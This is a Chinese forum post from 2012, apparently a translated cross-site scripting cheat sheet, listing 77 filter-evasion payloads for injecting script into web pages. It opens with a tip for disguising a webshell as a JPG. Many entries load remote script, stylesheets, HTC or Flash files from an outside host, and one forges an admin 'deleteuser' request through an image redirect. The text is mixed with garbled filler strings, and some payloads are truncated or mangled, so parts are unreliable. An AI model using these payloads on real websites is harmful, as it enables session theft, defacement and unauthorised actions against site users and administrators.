跨站图片shell
" H9 \& X& S) m2 BXSS跨站代码 <script>alert("")</script>6 ?! E! r( N5 C& X R
" N1 @( m0 f1 g; G* G, V3 Q将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马* f" u( l1 q4 P- C4 X+ n, n( a
: p! J F# W, ^1 R6 R
9 L# ]' i V- b5 c) m
6 i" ^6 x% q! Z$ p4 v1)普通的XSS JavaScript注入
) o# i7 c" A1 T& w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 E O' i7 t9 }% v6 L6 n# S+ J, _7 X* p6 _4 ?
(2)IMG标签XSS使用JavaScript命令4 x8 r" ~% \# c
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ d9 B: p k( q/ B! ~ T9 L
0 r( o3 f# p) l8 q Y* j
(3)IMG标签无分号无引号
0 v7 W5 z9 E4 g: b<IMG SRC=javascript:alert(‘XSS’)>
4 E3 k2 A, E/ c ~* C4 l& g2 X+ K' Q& Q, o0 w2 }
(4)IMG标签大小写不敏感% {6 n/ g+ f* O; W1 R' d! s5 Q
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! J( X! z% g" u) v; \
, C8 X% X$ J4 _5 E2 `3 Y(5)HTML编码(必须有分号)
0 d9 G0 X+ ^& J<IMG SRC=javascript:alert(“XSS”)>' S! f9 I. D s# Z
1 l; u, z; a3 z(6)修正缺陷IMG标签
5 F$ L' t3 _( y$ Y. m2 Y" ?<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 u: N5 `2 B0 J) H
( u5 M$ i q1 `7 {" Z" Z- P* G(7)formCharCode标签(计算器)
- \* Y" @$ R) j( N<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& _3 U7 Z, ]! e0 T* ?* ~8 z) R4 h/ A) h9 s1 Z
(8)UTF-8的Unicode编码(计算器)
8 Y- e4 v+ T/ H<IMG SRC=jav..省略..S')>
; c+ B7 O3 f4 ^) i" A. \" a. ?1 K& B5 w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# Z* H3 [! i- T9 w! c2 b& @2 E<IMG SRC=jav..省略..S')>
; @. t8 i- a0 s, j2 q( U
9 G% j' ]9 a0 r(10)十六进制编码也是没有分号(计算器)
) f) j9 I1 S7 J& L7 J6 f, r<IMG SRC=java..省略..XSS')>
1 K% Z' @$ n: a8 q3 h0 m2 d& ]1 s1 o8 ~* q4 e: J) y
(11)嵌入式标签,将Javascript分开
) ?6 e. F4 c" u1 t+ E! X6 b<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 }2 E% k& D: P/ ~, }4 @
0 q) D' t- ?& c+ @5 ^4 C(12)嵌入式编码标签,将Javascript分开3 y+ e' r7 j( [# M- T2 T6 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' c; d8 ` z& } o$ ?( h& j4 g) s7 W) a$ Q3 l; u5 I
(13)嵌入式换行符8 C* B* `! P/ E1 e# y9 c- k
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 k- \2 r. p$ ]% M* f! S
( K M5 x4 m- |" ~0 |; V9 a1 L+ ]
(14)嵌入式回车
0 T+ ~ |" e! Y<IMG SRC=”jav ascript:alert(‘XSS’);”>9 L$ P. T# D( U# y
4 w) i& p+ y8 |1 D9 M(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 d, S" [6 ^" }6 ~0 [7 {* n<IMG SRC=”javascript:alert(‘XSS‘)”>, W9 q' z% j i6 h
7 d A+ Q) p1 b
(16)解决限制字符(要求同页面)* ?0 @9 [3 s8 |5 Q1 O* y8 [& v' _
<script>z=’document.’</script>$ D; {# X6 i& Z- U2 G8 j& z; l
<script>z=z+’write(“‘</script>
/ q j% r6 A4 [. ~% r<script>z=z+’<script’</script># w8 ` _+ K- u; w1 `
<script>z=z+’ src=ht’</script>4 z$ o& T+ {6 E2 s3 T/ r
<script>z=z+’tp://ww’</script>
) j, i9 m7 n7 `* L) J<script>z=z+’w.shell’</script>
1 a, I7 }# ]* ~# B9 m<script>z=z+’.net/1.’</script>
# O* u* ]: o X! S% b2 Q* x1 v<script>z=z+’js></sc’</script>/ ^9 S9 D8 ?) v; r. z- v
<script>z=z+’ript>”)’</script>0 b; ~/ X! a- I, F
<script>eval_r(z)</script>
: N$ g5 k F8 \% L
6 {# C/ G& \' o(17)空字符3 B4 R2 H& Z8 ^
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; y$ @6 d: `1 j* U/ j2 c; U8 u, n7 r1 s
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 n' y E( e" T! k
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 i; A8 a! T% I+ ?6 F4 b4 D
" A$ U% @, D0 x! \' @) T, R: L* w(19)Spaces和meta前的IMG标签
" |' ~: n7 X `. I5 p8 L5 s<IMG SRC=” javascript:alert(‘XSS’);”>! \- l' C6 k8 a8 d9 t
2 ?6 i8 `1 ] b E
(20)Non-alpha-non-digit XSS) j4 g1 {* |* b0 C/ `$ |( n, C
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 @7 z& f% O% O/ l# Q$ v
: o' |, R* ~# n; ~9 _(21)Non-alpha-non-digit XSS to 2$ T3 [9 v- I6 P* V
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 Z( q- A1 D1 R& T2 F
+ Q+ ]! ~9 M0 b7 D(22)Non-alpha-non-digit XSS to 3
' g" @* x8 Z: Z7 z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% B! `9 P+ E& m9 s2 a
8 S2 Z. D" g. ^7 T. N0 {
(23)双开括号
+ `& A, h7 ^3 T: R<<SCRIPT>alert(“XSS”);//<</SCRIPT>( Z1 `+ E+ E. ]8 W* R b8 j5 s
' W9 w( S" m. V% Z2 h( x# k! Y
(24)无结束脚本标记(仅火狐等浏览器)
7 _- L, h6 N0 F+ ~: j* Y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( s" S5 P$ C. u- A) p
# V. V3 q1 {% v* P(25)无结束脚本标记2! U$ `* D9 c) Y5 L4 l7 [! r# |, S
<SCRIPT SRC=//3w.org/XSS/xss.js>9 b. e4 l" j( R3 W: x5 G. X
) o. n; N+ L' x
(26)半开的HTML/JavaScript XSS$ k2 j/ X9 H: Q! B$ p! Q
<IMG SRC=”javascript:alert(‘XSS’)”
6 `4 q+ _% U" d/ p. T
. M" x: B: {9 O6 R2 b(27)双开角括号
1 _3 Q- u7 e3 F6 [8 l, C<iframe src=http://3w.org/XSS.html <
6 ^8 j( D. x$ S( E+ X9 _' L' U5 `* T- n1 v& a6 j
(28)无单引号 双引号 分号
, U- T" a$ g: ?+ F5 y<SCRIPT>a=/XSS/7 B- Q/ n9 R- C4 \
alert(a.source)</SCRIPT>+ {/ g- @; j4 `/ m" |+ }
6 H+ P2 w4 c( |8 M* l
(29)换码过滤的JavaScript
! x% p3 T* w/ _\”;alert(‘XSS’);//3 Y- t' w2 C$ J& ~: K, \/ C' M
) d$ l# [# [1 Z# I& X" S
(30)结束Title标签! r+ x+ O: |7 E. C- O) @- n; s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; n+ `. J* j" S! G! w, @6 s* T5 L0 F' M% H
(31)Input Image( J" p& J0 n# H3 U' i2 ^
<INPUT SRC=”javascript:alert(‘XSS’);”>, P# W$ g9 p/ @: `
- L6 V0 o6 K5 |/ E8 j
(32)BODY Image
$ H0 m' R# ?) e& S+ L% H1 U; ^8 W<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
Q) i! g. h3 w* E' X3 T
: z1 _/ O5 Q' }! a( k& d(33)BODY标签
- x0 ~, I. J% v+ ^<BODY(‘XSS’)>
' q" B& Y1 H1 X7 s: n2 e6 `" J6 y+ x# y4 \. ?+ p
(34)IMG Dynsrc; F; _! y2 R4 G2 o/ x7 k
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
/ |/ A$ z+ |* _- U4 H
6 E6 E0 D: \; x6 |0 `+ I6 C(35)IMG Lowsrc( Q6 s+ R% U) R* h: {, K+ H2 F) s
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# n2 Z$ p1 D+ X' ]
6 l9 n+ D3 }# a$ g5 H(36)BGSOUND- ?# _$ y' T3 l) C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>7 \* e& J1 N2 E C# M
5 J) F: Z; r: q5 Y- B8 o" `! d(37)STYLE sheet7 ^5 I. q! x/ G2 |
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; B' {# y, A; r, S& I7 f- o# p" [- F# ~5 l
(38)远程样式表; Q/ |( T( i D5 ?$ j
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
" I8 C" I" W6 a6 K8 b
5 H ]7 T. V* p3 N/ g0 m8 W/ B(39)List-style-image(列表式)
9 u9 ?. L5 R) C2 y4 U0 D<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS2 n o3 n( Y$ [4 s# G# s
3 n% |6 {' P/ ~* ?! m) o3 V
(40)IMG VBscript2 C. a' }% x3 D ?# ] X8 ]- D
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; T0 D) x. t5 z% s! T& d9 K
4 |) G" b% I0 U# }
(41)META链接url9 U: H" ^- i$ E# h( @$ d0 X( w6 e3 f, U
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>: e% u7 G9 I. N2 S
+ C9 L4 z* e: c7 \/ S7 z(42)Iframe% O) s0 M3 ?) E7 \9 V0 x ^
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
& q8 C9 c8 l% X/ r$ Q/ _(43)Frame
3 g- |. w) j3 Q<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 c) B7 N6 G1 h y$ V9 Y4 E b8 ^8 v
(44)Table
+ l! | ^, o/ z& S<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 H1 |1 L' q' [- j# O; c Q% T2 u6 C4 a# w& c0 u7 i# H; Z
(45)TD' O5 J: Y, F) i/ W+ I* K- \* f: G
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! F4 B9 T3 q+ }9 z8 q: Z" `6 V1 ?8 w
8 E! y# r |% h* f
(46)DIV background-image
* E* S3 ~. @. W% M- M<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! _. w! L+ v5 k6 A( G
5 _9 W4 z* S- \8 a5 h4 a
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)% I# s9 c P& N' x0 y
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
# `6 [3 _1 g: b% F; T- o: }: c9 G/ o6 e
(48)DIV expression
- J; f: n# Q6 y# p<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
8 M: _7 E: ^; S9 {, ~3 n; q- s" s4 K0 H% @) J2 }+ g7 A
(49)STYLE属性分拆表达) R8 P# x7 U3 @( e% r
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ k0 q1 ~% B$ Q# L7 K, `/ }
1 Y8 K8 c# I. c0 u' t+ L(50)匿名STYLE(组成:开角号和一个字母开头)
2 Q# e1 m h1 L i9 v3 y( d; c8 F- e- R<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ P2 g# }) E! A: F0 z; g# `
/ |$ i' n; i, g" C9 P
(51)STYLE background-image+ b/ M2 i N( G/ w$ o' W) a* l2 `
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
4 U% k0 N- H7 R; R
) A" S. _7 ]% w0 J(52)IMG STYLE方式
E/ d1 [1 S9 j8 U2 N3 ]exppression(alert(“XSS”))’>& E6 |* @$ G& [* ]- [- |
! N% M7 D5 A' R
(53)STYLE background% m+ \$ J8 @' t6 J$ C1 w* [
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: g& |0 |: j1 S7 e0 ]$ v% D, A# f
% }2 V: B1 V# Q; ~5 k6 W(54)BASE! U7 Q. O$ n* u5 [; o
<BASE HREF=”javascript:alert(‘XSS’);//”>
: e' f5 s6 k) x( n( U% y3 }. b/ P n/ U
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" V4 C( Z6 W7 q) k/ Q- T<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>2 W* K" v8 ^3 \9 l
1 u- j- i" J3 F$ A
(56)在flash中使用ActionScrpt可以混进你XSS的代码; h( |* ?, `% Y5 N; N6 v V% _
a=”get”;
" [2 q* v9 S$ `* U) m) x" v* i+ Mb=”URL(\”";
5 W8 B9 K, \9 k o" j( ac=”javascript:”;
D5 n. @/ t B+ E) Zd=”alert(‘XSS’);\”)”; T, n6 ~( }* T" r
eval_r(a+b+c+d);1 O. W9 Z, F. B. z0 j
, _% v( i6 L/ v; q+ t( y(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( c2 s/ y E" ~" ]8 r8 I
<HTML xmlns:xss>5 O- L9 z2 O* i6 ?2 j
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ \3 P- s+ W, w2 [1 s i% U<xss:xss>XSS</xss:xss>
i& i6 |# L, f, O d</HTML>+ \4 ~' m/ P! ?* r, D* b4 L$ Z" e( Y
' S4 j" O; ], \0 s% G. T" G(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
4 M6 {* i* Q" V2 E<SCRIPT SRC=””></SCRIPT>3 M9 o5 h4 R- S
; a, R- I$ F' k(59)IMG嵌入式命令,可执行任意命令
4 }8 H5 f/ x! f4 g( j<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 E1 q- x, j+ h+ n% X) @3 w" n: {8 I+ c
(60)IMG嵌入式命令(a.jpg在同服务器)
. e) Y: G% y, [/ ARedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* |9 M6 R* c3 ]/ A& s9 c) D: Z! J4 B( R
(61)绕符号过滤/ ]( d! W" C1 t, g' ?7 R
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 n# P1 i7 l- }: W, E
9 I7 h+ G1 l) M; Q+ \( G) S! L& Y(62)
9 _- g, C8 \0 u; F' v' Y<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 M& g8 J1 Y2 r; x
; {) u9 O4 F2 I6 d- q- W(63). r5 A% A1 \- H2 b8 u9 ]+ ]
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
) D$ f- b: A! u5 t* r5 x! X, ]2 X& e& o4 Q7 e% H) B. W1 k# m8 j
(64)4 a1 o! L+ `8 e% g3 I: M
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 B( @, V! c7 W, y* D7 k
5 E' v3 S8 Y( Z3 q/ |8 o(65), c# Q- }7 G* o2 p2 Q- L( U/ q
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* C' M, |- t$ C5 W7 F2 W9 b
9 X: J9 I ~6 l5 b# {4 Z; {3 [(66)" P" H/ z* D+ _5 _0 _: a7 `
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 O' l9 U+ h# c' ?) v3 V8 S1 Q, e3 x! A' R2 m7 Z4 |- D. v r
(67)% ~( g' U/ x' t4 N$ J" O
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>- W, q, p& }( x+ l4 Z
$ N7 W. g6 Z2 Y& }/ J$ ~& H
(68)URL绕行
! s( Y1 ~& R7 X/ K% ~<A HREF=”http://127.0.0.1/”>XSS</A>
9 _% L9 k5 F1 V
* z* Q; L. E: v& x$ E* d7 L(69)URL编码
( T6 w. x8 g' k' o+ I8 N M<A HREF=”http://3w.org”>XSS</A>) h3 j8 z2 w% C* R6 F) W2 A- k1 q% [
0 ^+ I# _" T: a: Z* x
(70)IP十进制* S9 a$ I& w/ ^6 H, Z8 T
<A HREF=”http://3232235521″>XSS</A>
2 X4 ?' b/ C! _; W9 b
8 x- n( E$ c0 ]. m, L$ f3 q u$ S(71)IP十六进制
! o" X9 n7 Q% w5 L<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>6 y. ]; g; |; P7 s- C
, t# d2 V1 p! a3 e T/ _; Q
(72)IP八进制
( N; L) x3 b: M6 H& b5 A Z<A HREF=”http://0300.0250.0000.0001″>XSS</A>
1 v2 G! m! N$ E# t, O( J/ v- ^* V& s2 F
(73)混合编码7 N) O; U+ y3 p2 s
<A HREF=”h( ]- I8 \' P9 C& z9 I6 @, s1 F8 s9 t
tt p://6 6.000146.0×7.147/”">XSS</A>: W( N+ J% O) p% k
' j, U4 q; D0 q' @% r5 \
(74)节省[http:]& ~4 r- Z, G( }: E6 ^$ R0 v' h! Y
<A HREF=”//www.google.com/”>XSS</A>( M! X, a, S, P. d. O: D3 C
" C0 U7 B" \; p; x2 H K$ i(75)节省[www]1 c$ o7 e( @! R+ f% f
<A HREF=”http://google.com/”>XSS</A>
& @1 O: {$ [3 N( C0 Y5 Z2 h- M/ ]8 G" m$ l
(76)绝对点绝对DNS5 v# p. s4 I, D& H! o- {7 _* x a
<A HREF=”http://www.google.com./”>XSS</A>
1 Q6 J2 Z+ {6 g1 r/ Q+ K1 ]4 E V, _
(77)javascript链接
?8 M: u* K; d<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>' ~( _+ ~- {: H7 x# Y" k( d9 k
|
发表于 2012-9-13 17:04:56
收藏
支持
反对